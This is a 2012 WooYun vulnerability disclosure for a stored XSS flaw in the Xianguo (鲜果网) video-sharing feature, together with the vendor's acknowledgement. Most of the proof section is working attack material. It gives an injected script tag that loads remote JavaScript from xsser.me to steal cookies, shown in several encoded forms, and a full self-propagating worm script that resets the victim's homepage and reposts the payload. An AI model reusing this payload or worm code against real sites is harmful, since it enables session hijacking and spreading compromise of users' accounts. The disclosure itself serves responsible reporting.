当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012579

漏洞标题:鲜果网Xss,可蠕虫,理论上可对用户持久控制

相关厂商:鲜果网

漏洞作者: imlonghao

提交时间:2012-09-22 22:56

修复时间:2012-11-06 22:58

公开时间:2012-11-06 22:58

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-09-22: 细节已通知厂商并且等待厂商处理中
2012-09-23: 厂商已经确认,细节仅向厂商公开
2012-10-03: 细节向核心白帽子及相关领域专家公开
2012-10-13: 细节向普通白帽子公开
2012-10-23: 细节向实习白帽子公开
2012-11-06: 细节向公众公开

简要描述:

发现大伙很喜欢欺负新来的厂商~~~
鲜果网Xss,可蠕虫,理论上可对用户持久控制

详细说明:

鲜果日志里面的分享视频和音乐中,可以通过插入一些跨站代码来实现XSS的效果,详见证明。
对用户进行持久控制,可以通过发一条含有跨站代码的日志,然后将鲜果社区设为我的鲜果首页,这样就可以实现对用户进行持久控制,这样用户每点登录一次鲜果就可以触发一次鲜果,一次又一次,一次又一次
演示地址:http://xianguo.com/1378148/

漏洞证明:

首先我们来到分享视频的地方,我们随便写一个视频 ,保存,截包。
在video这个地方会发现一个神奇的东西,

%7B%22flashvar%22%3A%22OgYtHXq8oVw%22%2C%22flash%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fv%2FOgYtHXq8oVw%2Fv.swf%22%2C%22imageurl%22%3A%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg'%20%2Clpic%20%3D%20%5C%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg%22%2C%22title%22%3A%22%E6%9D%A8%E5%B9%82%20%E5%88%98%E6%81%BA%E5%A8%81%20%E9%94%99%E6%80%AA%22%2C%22flag%22%3A1%2C%22url%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fprograms%2Fview%2FOgYtHXq8oVw%22%7D


进行一下URIComp解码

{"flashvar":"OgYtHXq8oVw","flash":"http://www.tudou.com/v/OgYtHXq8oVw/v.swf","imageurl":"http://i1.tdimg.com/118/195/384/p.jpg' ,lpic = \"http://i1.tdimg.com/118/195/384/p.jpg","title":"杨幂 刘恺威 错怪","flag":1,"url":"http://www.tudou.com/programs/view/OgYtHXq8oVw"}


看到了我们很熟悉的{}这种类型,弱弱的表示不懂的专业术语是什么.......
然后将我们的跨站代码进行Unicode编码
"><script src=http://xsser.me/pIQKKz></script>

\u0022\u003E\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003D\u0068\u0074\u0074\u0070\u003A\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003E\u003C\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003E


然后将上面的编码插入到flash地址中

{"flashvar":"OgYtHXq8oVw","flash":"http://www.tudou.com/v/OgYtHXq8oVw/v.swf\u0022\u003E\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003D\u0068\u0074\u0074\u0070\u003A\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003E\u003C\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003E","imageurl":"http://i1.tdimg.com/118/195/384/p.jpg' ,lpic = \"http://i1.tdimg.com/118/195/384/p.jpg","title":"杨幂 刘恺威 错怪","flag":1,"url":"http://www.tudou.com/programs/view/OgYtHXq8oVw"}


进行URIComp编码

%7B%22flashvar%22%3A%22OgYtHXq8oVw%22%2C%22flash%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fv%2FOgYtHXq8oVw%2Fv.swf%5Cu0022%5Cu003E%5Cu003C%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu0020%5Cu0073%5Cu0072%5Cu0063%5Cu003D%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003A%5Cu002f%5Cu002f%5Cu0078%5Cu0073%5Cu0073%5Cu0065%5Cu0072%5Cu002e%5Cu006d%5Cu0065%5Cu002f%5Cu0070%5Cu0049%5Cu0051%5Cu004b%5Cu004b%5Cu007a%5Cu003E%5Cu003C%5Cu002f%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu003E%22%2C%22imageurl%22%3A%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg'%20%2Clpic%20%3D%20%5C%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg%22%2C%22title%22%3A%22%E6%9D%A8%E5%B9%82%20%E5%88%98%E6%81%BA%E5%A8%81%20%E9%94%99%E6%80%AA%22%2C%22flag%22%3A1%2C%22url%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fprograms%2Fview%2FOgYtHXq8oVw%22%7D


然后替换掉原来的video中。


效果如下


COOKIES


其实拿到了COOKIES就可以登录了,但还是来说说持久控制。

var pkav={
ajax:function(){
var xmlHttp;
try{
xmlHttp=new XMLHttpRequest();
}catch (e){
try{
xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
}catch (e){
try{
xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e){
return false;
}
}
}
return xmlHttp;
},
req:function(url,data,method,callback){
method=(method||"").toUpperCase();
method=method||"GET";
data=data||"";
if(url){
var a=this.ajax();
a.open(method,url,true);
if(method=="POST"){
a.setRequestHeader("Content-type","application/x-www-form-urlencoded");
}
a.onreadystatechange=function(){
if (a.readyState==4 && a.status==200)
{
if(callback){
callback(a.responseText);
}
}
};
if((typeof data)=="object"){
var arr=[];
for(var i in data){
arr.push(i+"="+encodeURIComponent(data[i]));
}
a.send(arr.join("&"));
}else{
a.send(data||null);
}
}
},
get:function(url,callback){
this.req(url,"","GET",callback);
},
post:function(url,data,callback){
this.req(url,data,"POST",callback);
}
};
if(!window.__x){
pkav.post("http://xianguo.com/doings/sethome","type=snsSet",function(rs){});
pkav.post("http://xianguo.com/doings/addblog","videoKeyword=&tag-input=%E6%B7%BB%E5%8A%A0%E6%A0%87%E7%AD%BE%EF%BC%8C%E7%94%A8%E9%80%97%E5%8F%B7%E6%88%96%E5%9B%9E%E8%BD%A6%E5%88%86%E9%9A%94&tags=%255B%255D&video=%257B%2522flashvar%2522%253A%2522OgYtHXq8oVw%2522%252C%2522flash%2522%253A%2522http%253A%252F%252Fwww.tudou.com%252Fv%252FOgYtHXq8oVw%252Fv.swf%255Cu0022%255Cu003E%255Cu003C%255Cu0073%255Cu0063%255Cu0072%255Cu0069%255Cu0070%255Cu0074%255Cu0020%255Cu0073%255Cu0072%255Cu0063%255Cu003D%255Cu0068%255Cu0074%255Cu0074%255Cu0070%255Cu003A%255Cu002f%255Cu002f%255Cu0078%255Cu0073%255Cu0073%255Cu0065%255Cu0072%255Cu002e%255Cu006d%255Cu0065%255Cu002f%255Cu0070%255Cu0049%255Cu0051%255Cu004b%255Cu004b%255Cu007a%255Cu003E%255Cu003C%255Cu002f%255Cu0073%255Cu0063%255Cu0072%255Cu0069%255Cu0070%255Cu0074%255Cu003E%2522%252C%2522imageurl%2522%253A%2522http%253A%252F%252Fi1.tdimg.com%252F118%252F195%252F384%252Fp.jpg'%2520%252Clpic%2520%253D%2520%255C%2522http%253A%252F%252Fi1.tdimg.com%252F118%252F195%252F384%252Fp.jpg%2522%252C%2522title%2522%253A%2522%25E6%259D%25A8%25E5%25B9%2582%2520%25E5%2588%2598%25E6%2581%25BA%25E5%25A8%2581%2520%25E9%2594%2599%25E6%2580%25AA%2522%252C%2522flag%2522%253A1%252C%2522url%2522%253A%2522http%253A%252F%252Fwww.tudou.com%252Fprograms%252Fview%252FOgYtHXq8oVw%2522%257D&editorValue=%3Cp%3E%E9%BB%84%E9%87%91%E5%91%A8%E5%85%A8%E5%9B%BD80%E6%99%AF%E7%82%B9%E4%B8%8B%E8%B0%83%E7%A5%A8%E4%BB%B7%3C%2Fp%3E",function(rs){});
window.__x=1;
}


第一个包是设置互动社区为首页
第二个包是发送一条微博

修复方案:

加强过滤~~~~~~~~~
时间不足,不多打字了。。。

版权声明:转载请注明来源 imlonghao@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-09-23 00:21

厂商回复:

非常感谢@imlonghao,我们已经安排跟进尽快修复。再次感谢。

最新状态:

暂无